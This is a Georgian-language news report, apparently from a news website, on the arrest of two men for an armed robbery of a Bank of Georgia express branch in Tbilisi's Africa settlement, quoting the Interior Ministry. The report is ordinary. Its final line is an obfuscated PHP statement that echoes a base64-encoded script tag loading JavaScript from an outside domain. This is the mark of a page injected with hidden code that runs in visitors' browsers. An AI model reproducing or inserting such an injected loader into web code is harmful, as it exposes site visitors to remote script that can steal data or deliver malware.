celsiusi
ავერსი საქკაბელი
შინაგან საქმეთა სამინისტროს თბილისის პოლიციის დეპარტამენტის ისანი-სამგორის მთავარი სამმართველოს თანამშრომლებმა, ცხელ კვალზე ჩატარებული ოპერატიულ-სამძებრო ღონისძიებების და საგამოძიებო მოქმედებების შედეგად, თბილისში, აფრიკის დასახლებაში მდებარე „საქართველოს ბანკის“ ექსპრესფილიალზე ყაჩაღური თავდასხმის ფაქტზე, წარსულში ნასამართლევი 2 პირი: 1992 წელს დაბადებული დ.ბ. და ამავე წელს დაბადებული გ.ჟ. დააკავეს. ინფორმაციას შსს – ავრცელებს. 
 
უწყების ცნობით, დანაშაული 6-დან 9 წლამდე ვადით თავისუფლების აღკვეთას ითვალისწინებს.
 
"გამოძიებით დადგინდა, რომ ავტომატური ცეცხლსასროლი იარაღითა და პისტოლეტით შეიარაღებული ბრალდებულები მიმდინარე წლის 1-ელ აპრილს, საღამოს, თბილისში, აფრიკის დასახლებაში მდებარე „საქართველოს ბანკის“ ექსპრესფილიალში შეიჭრნენ. ცეცხლსასროლი იარაღის მუქარით მოლარე-ოპერატორს ფული გასტაცეს, რა დროსაც დაცვის პოლიციის თანამშრომელმა, დანაშაულის აღკვეთის მიზნით, ცეცხლსასროლი იარაღიდან გასროლა განახორციელა.
 
ორივე თავდამსხმელი მსუბუქად დაიჭრა, თუმცა ბრალდებულებმა ბანკის ტერიტორიის დატოვება მოახერხეს, ჩასხდნენ იქვე მდგომ ავტომობილში და იარაღის მუქარით აიძულეს მძღოლი, რომ ისინი კონკრეტულ მისამართზე წაეყვანა.
 
სამართალდამცველებმა, ჩატარებული საგამოძიებო მოქმედებების შედეგად, რამდენიმე საათში დაადგინეს თავდამსხმელების ვინაობა და ადგილმდებარეობა. პოლიციამ ორივე მათგანი მომხდარიდან მალევე, ცხელ კვალზე დააკავა.
 
ბრალდებულების დაკავების ადგილას, საცხოვრებელი ბინის ფარდულის ჩხრეკისას ამოღებული იქნა დანაშაულის ჩადენის იარაღები, ხოლო ავტომანქანიდან, რომლითაც თავდამსხმელებმა შემთხვევის ადგილი დატოვეს, ამოღებულია ბანკიდან წაღებული ფულის ნაწილი.
 
გამოძიება საქართველოს სისხლის სამართლის კოდექსის 179-ე მუხლის მე-2 ნაწილის „ბ“ ქვეპუნქტით და 236-ე მუხლის მე-3 და მე-4 ნაწილებით მიმდინარეობს, რაც ჯგუფურად ჩადენილ ყაჩაღობას და ცეცხლსასროლი იარაღის მართლსაწინააღმდეგო შეძენა-შენახვა-ტარებას გულისხმობს." – წერია სამინისტროს მიერ გავრცელებულ ინფორმაციაში.
836
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");